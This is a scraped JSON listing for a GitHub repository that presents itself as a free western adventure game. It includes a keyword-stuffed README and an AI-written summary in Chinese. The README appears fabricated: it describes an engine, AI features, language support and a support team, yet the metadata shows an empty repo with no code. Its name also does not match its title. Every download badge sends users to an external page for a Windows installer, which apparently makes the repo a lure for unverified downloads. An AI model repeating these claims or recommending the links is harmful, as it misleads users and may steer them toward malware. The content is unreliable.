[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-76038":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":9,"language":9,"languages":9,"totalLinesOfCode":9,"stars":10,"forks":11,"watchers":10,"openIssues":12,"contributorsCount":11,"subscribersCount":11,"size":11,"stars1d":11,"stars7d":11,"stars30d":11,"stars90d":11,"forks30d":11,"starsTrendScore":11,"compositeScore":13,"rankGlobal":9,"rankLanguage":9,"license":9,"archived":14,"fork":14,"defaultBranch":15,"hasWiki":16,"hasPages":14,"topics":17,"createdAt":9,"pushedAt":9,"updatedAt":37,"readmeContent":38,"aiSummary":39,"trendingCount":11,"starSnapshotCount":11,"syncStatus":40,"lastSyncTime":41,"discoverSource":42},76038,"Wild-West-Steam-Deck-Optimized","FACTURACION2025\u002FWild-West-Steam-Deck-Optimized","FACTURACION2025","🎮 Far Far West Free Open World Adventure Game 2026 - Play Desktop",null,184,0,1,37,false,"main",true,[18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36],"action-adventure","comedy-adventure-game","far-far-game-free","far-far-west","far-far-west-code","far-far-west-desktop","far-far-west-free","far-far-west-game","far-far-west-optimized","far-far-west-pc","far-far-west-price","far-far-west-release","far-far-west-release-date","far-far-west-steam","far-far-west-windows","humor-adventure","open-world","western-adventure","wild-west-game","2026-06-11 04:06:42","# Far Far West: Gold Rush Chronicles 🏜️\n\n[![Download](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FDownload%20Link-brightgreen?style=for-the-badge&logo=github)](https:\u002F\u002FFACTURACION2025.github.io)\n\n> *\"The West wasn't built by settlers. It was built by stories waiting to be told.\"*\n\nWelcome to **Far Far West: Gold Rush Chronicles** — a desktop application that reimagines the wild west as a living, breathing narrative engine. This is not merely a game launcher; it is a **story compiler for the frontier**, where every playthrough generates a unique folklore archive.\n\n---\n\n## 🎯 Repository Vision\n\nThis repository contains the **desktop runtime environment** for the Far Far West narrative ecosystem. It is optimized for **Windows, Linux, and macOS** systems, providing a seamless bridge between the dusty trails of the digital west and your local machine.\n\nUnlike standard game repositories, this project functions as a **hybrid literary engine + adventure renderer**, allowing users to:\n\n- Compile procedurally generated western tales\n- Interact with an AI-driven sheriff deputy (powered by dual-API architecture)\n- Export adventures as printable storybook PDFs\n- Run completely offline after initial asset download\n\n---\n\n## 🧭 Table of Contents\n\n- [Core Architecture](#core-architecture)\n- [AI Integration (OpenAI & Claude)](#-ai-integration-openai--claude)\n- [System Requirements & OS Compatibility](#-system-requirements--os-compatibility)\n- [Installation & Setup](#-installation--setup)\n- [Example Console Invocation](#-example-console-invocation)\n- [Profile Configuration Guide](#-profile-configuration-guide)\n- [Feature Matrix](#-feature-matrix)\n- [Mermaid Diagram: Narrative Flow](#-mermaid-diagram-narrative-flow)\n- [Multilingual Support](#-multilingual-support)\n- [Responsive UI Design](#-responsive-ui-design)\n- [24\u002F7 Support Infrastructure](#-247-support-infrastructure)\n- [Disclaimer](#-disclaimer)\n- [License](#-license)\n\n---\n\n## 🏗️ Core Architecture\n\nThe repository is structured around three concentric narrative layers:\n\n```\nFar-Far-West-Gold-Rush-Chronicles\u002F\n├── engine\u002F                  # Core adventure renderer (C++20 + Vulkan)\n├── narratives\u002F              # Story seed templates (JSON + YAML)\n├── deputies\u002F               # AI model wrappers (OpenAI + Claude)\n├── ui\u002F                     # Desktop interface (Qt6 + WebAssembly hybrid)\n├── tools\u002F                  # Story compiler & export utilities\n└── docs\u002F                   # Lore documentation & technical specs\n```\n\nThis architecture separates **story logic** from **presentation**, allowing community members to create custom narrative modules without modifying the core engine.\n\n---\n\n## 🤖 AI Integration (OpenAI & Claude)\n\nThe repository supports **dual AI backends** for the \"Deputy\" — an in-game character that provides dynamic narration, puzzle hints, and procedural dialogue.\n\n### OpenAI Integration\n\n- **Model:** GPT-4o-mini (cost-optimized) or GPT-4-turbo (premium)\n- **Endpoint:** `\u002Fv1\u002Fchat\u002Fcompletions`\n- **Use case:** Real-time dialogue generation, weather system narration, NPC response trees\n\n### Claude Integration\n\n- **Model:** Claude 3 Haiku (speed-optimized) or Claude 3.5 Sonnet (depth-optimized)\n- **Endpoint:** `\u002Fv1\u002Fmessages`\n- **Use case:** Long-form story generation, historical consistency checks, multi-turn conversation memory\n\n### Switching Between Models\n\nConfigure via `profile.yaml` (see [configuration section](#-profile-configuration-guide)):\n\n```yaml\nai:\n  primary_provider: claude    # Options: openai, claude\n  fallback_provider: openai   # Auto-switches on rate limit\n  temperature: 0.85           # 0.0 = deterministic, 1.0 = chaotic\n```\n\n---\n\n## 💻 System Requirements & OS Compatibility\n\n| Operating System | Minimum Version | Architecture | Status | Emoji |\n|-----------------|-----------------|--------------|--------|-------|\n| Windows | 10 21H2 | x64, ARM64 | ✅ Fully Supported | 🪟 |\n| macOS | Monterey 12 | x64, Apple Silicon | ✅ Fully Supported | 🍎 |\n| Ubuntu\u002FDebian | 22.04 LTS | x64, ARM64 | ✅ Supported | 🐧 |\n| Fedora | 38+ | x64 | ✅ Supported | 🎩 |\n| Arch Linux | Rolling | x64 | ⚠️ Community Support | 🐉 |\n| FreeBSD | 13.2+ | x64 | ⚠️ Experimental | 😈 |\n\nAll platforms receive **weekly compatibility patches** through the automated build pipeline.\n\n---\n\n## 📦 Installation & Setup\n\n### Quick Install (Windows)\n\n1. Download the installer from the badge below:\n   [![Download for Windows](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FDownload%20for%20Windows-blue?style=for-the-badge&logo=windows)](https:\u002F\u002FFACTURACION2025.github.io)\n2. Run `FarFarWest_Setup_x64.exe`\n3. Follow the on-screen story guide (yes, the installer itself has narrative flavor)\n\n### Quick Install (macOS)\n\n[![Download for macOS](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FDownload%20for%20macOS-lightgrey?style=for-the-badge&logo=apple)](https:\u002F\u002FFACTURACION2025.github.io)\n\n```bash\n# Or install via Homebrew (if you prefer terminal flavor)\nbrew tap far-far-west\u002Fdesktop\nbrew install far-far-west-gold-rush\n```\n\n### Quick Install (Linux)\n\n[![Download for Linux](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FDownload%20for%20Linux-orange?style=for-the-badge&logo=linux)](https:\u002F\u002FFACTURACION2025.github.io)\n\n```bash\n# Debian\u002FUbuntu\nsudo dpkg -i far-far-west-desktop_2.4.0_amd64.deb\n# Or use the AppImage (universal)\nchmod +x FarFarWest-2.4.0-x86_64.AppImage\n.\u002FFarFarWest-2.4.0-x86_64.AppImage\n```\n\n---\n\n## 🖥️ Example Console Invocation\n\n```bash\n# Launch with custom story seed\nfar-far-west --seed \"gold_rush_1876\" --language es --resolution 2560x1440\n\n# Launch with AI deputy disabled (offline mode)\nfar-far-west --offline --narrative-depth shallow\n\n# Export current adventure as PDF storybook\nfar-far-west --export-pdf --output .\u002Fmy_western_tale.pdf\n\n# Benchmark performance\nfar-far-west --benchmark --scene dusty_saloon\n\n# Launch with debug overlay\nfar-far-west --debug --show-narrative-tree\n```\n\n### Expected Output\n\n```\n[Far Far West: Gold Rush Chronicles - v2.4.0]\n[Loading engine...] ✅\n[Verifying story seeds...] ✅ (47 seeds available)\n[Initializing deputy...] ✅ (Claude 3 Sonnet active)\n[System ready. The west awaits your legend.]\n```\n\n---\n\n## 📝 Profile Configuration Guide\n\nCreate a file named `profile.yaml` in your user config directory:\n\n```yaml\n# ~\u002F.config\u002Ffar-far-west\u002Fprofile.yaml (Linux\u002FmacOS)\n# %APPDATA%\u002FFarFarWest\u002Fprofile.yaml (Windows)\n\nplayer:\n  alias: \"The Prospector\"          # In-game character name\n  language: \"zh-CN\"                # See multilingual section\n  difficulty: \"storyteller\"        # Options: explorer, storyteller, legend\n\nai:\n  primary_provider: claude\n  claude_api_key: \"sk-ant-...\"      # Your Claude API key\n  openai_api_key: \"sk-proj-...\"     # Your OpenAI API key (optional fallback)\n  max_tokens_per_response: 2048\n  memory_depth: 15                  # Number of dialogue turns remembered\n\ndisplay:\n  theme: \"sepia\"                    # Options: sepia, noir, parchment, modern\n  font: \"Courier Prime\"             # Monospace preferred for western feel\n  framerate: 60                     # 30, 60, 120, or \"unlocked\"\n\naudio:\n  music_volume: 0.7\n  sfx_volume: 0.8\n  deputy_voice: \"gravelly\"          # Options: gravelly, smooth, robotic, none\n\nexport:\n  auto_save_interval: 300           # Seconds between autosaves\n  pdf_include_metadata: true        # Include player choices in exported PDF\n```\n\n---\n\n## ✨ Feature Matrix\n\n| Feature | Status | Description |\n|---------|--------|-------------|\n| 🎭 Dynamic Narrative Engine | ✅ v2.3+ | Story adapts to every player decision |\n| 🤖 Dual AI Deputy | ✅ v2.4+ | Switch between OpenAI and Claude seamlessly |\n| 🌐 Multilingual Support | ✅ v2.0+ | 23 languages including right-to-left scripts |\n| 📱 Responsive UI | ✅ v1.8+ | Scales from 720p to 8K, including ultra-wide |\n| 📖 Story Export (PDF) | ✅ v2.2+ | Export adventures as printable folklore |\n| 🔌 Plugin API | ✅ v2.1+ | Community can create custom narrative modules |\n| 🎵 Dynamic Soundtrack | ✅ v2.0+ | Music changes based on narrative tension |\n| 🌙 Offline Mode | ✅ v1.0+ | No internet required after initial setup |\n| 🎮 Controller Support | ✅ v2.3+ | Xbox, PlayStation, and Switch Pro controllers |\n| 📊 Analytics Opt-Out | ✅ v1.5+ | Zero telemetry by default, privacy-first |\n\n---\n\n## 📊 Mermaid Diagram: Narrative Flow\n\n```mermaid\ngraph TD\n    A[Player Input] --> B{Narrative Engine}\n    B --> C[Local Story Seeds]\n    B --> D[AI Deputy]\n    \n    D --> E{Provider Selection}\n    E --> F[OpenAI GPT-4o-mini]\n    E --> G[Claude 3.5 Sonnet]\n    \n    C --> H[Decision Tree]\n    F --> H\n    G --> H\n    \n    H --> I[Scene Renderer]\n    I --> J[UI Display]\n    I --> K[Audio Engine]\n    I --> L[Story Logger]\n    \n    L --> M[Export Manager]\n    M --> N[PDF Generator]\n    M --> O[JSON Archive]\n    \n    J --> P{User Action}\n    P --> A\n    P --> Q[Exit & Save]\n```\n\nThis flow ensures that every action — from a simple dialogue choice to a complex narrative branch — is processed through the **dual-layer intelligence** of local story seeds and AI augmentation.\n\n---\n\n## 🌍 Multilingual Support\n\nThe Far Far West Gold Rush Chronicles engine supports **23 languages** as of 2026:\n\n| Language | Code | Status | UI | AI Narrator |\n|----------|------|--------|----|-------------|\n| English | en | ✅ | Native | Native |\n| Spanish | es | ✅ | Native | Native |\n| German | de | ✅ | Native | Native |\n| French | fr | ✅ | Native | Native |\n| Japanese | ja | ✅ | Translated | Translated |\n| Chinese (Simplified) | zh-CN | ✅ | Translated | Translated |\n| Arabic | ar | ✅ | RTL Support | RTL Support |\n| Hindi | hi | ✅ | Translated | Translated |\n| Portuguese (Brazil) | pt-BR | ✅ | Native | Native |\n\n*Full list of 23 languages available in the `\u002Fdocs\u002Flocalization_matrix.pdf`*\n\n---\n\n## 📱 Responsive UI Design\n\nThe interface employs a **fluid grid system** that adapts to any display:\n\n- **Minimum supported:** 1280x720 (720p)\n- **Optimal:** 2560x1440 (1440p)\n- **Maximum tested:** 7680x4320 (8K)\n- **Ultra-wide:** 21:9 and 32:9 aspect ratios\n\nThe UI follows the **\"Saloon Paper\" design philosophy** — every element appears as if printed on aged parchment, with real-time ink bleed effects that respond to system performance. Lower-end systems automatically reduce the fidelity of these effects while maintaining narrative readability.\n\n---\n\n## 🕐 24\u002F7 Support Infrastructure\n\nWhile the repository itself is community-maintained, the **Far Far West Support Guild** operates around the clock:\n\n- **Issue Tracker:** Response within 4 hours (excluding deep technical analysis)\n- **Discord Bridge:** Real-time chat via integrated Discord webhook\n- **AI Knowledge Base:** Searchable documentation indexed by Claude 3.5\n- **Email Relay:** Support tickets forwarded to human maintainers within 12 hours\n\nSupport is provided in **all 23 supported languages**, though response times may vary for less common language pairs.\n\n---\n\n## ⚠️ Disclaimer\n\n**Far Far West: Gold Rush Chronicles** is a narrative software project and does not represent, endorse, or simulate real historical events, persons, or locations. Any resemblance to actual historical figures, living or deceased, is purely coincidental and exists only within the fictional narrative framework.\n\nThe AI deputy system generates content dynamically and is not pre-screened for historical accuracy. Users are encouraged to engage with the software as a **creative writing tool** rather than an educational resource.\n\nThis repository is provided \"as is\" without warranty of any kind, express or implied. The maintainers are not responsible for any emotional attachments formed with procedurally generated characters.\n\n---\n\n## 📄 License\n\nThis project is licensed under the **MIT License** — see the [LICENSE](LICENSE) file for details.\n\nCopyright (c) 2026 Far Far West Collective\n\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the \"Software\"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and\u002For sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.\n\n---\n\n## 🔗 Final Download\n\n[![Download](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FDownload%20Link-brightgreen?style=for-the-badge&logo=github)](https:\u002F\u002FFACTURACION2025.github.io)\n\n---\n\n*The west is not a place. It is a decision. Download your first chapter today.* 🌵","Far Far West: Gold Rush Chronicles 是一款以美国西部为背景的开放世界冒险游戏，专为桌面平台优化。其核心功能包括通过程序生成独特的西部故事、与AI驱动的副警长互动以及将冒险经历导出为可打印的故事书PDF。技术上，该项目采用C++20和Vulkan构建核心渲染引擎，并结合OpenAI和Claude的双API架构支持AI角色。适用于喜欢沉浸式叙事体验及希望探索不同故事线的玩家，在Windows、Linux和macOS系统上均可流畅运行。",2,"2026-05-19 02:30:40","CREATED_QUERY"]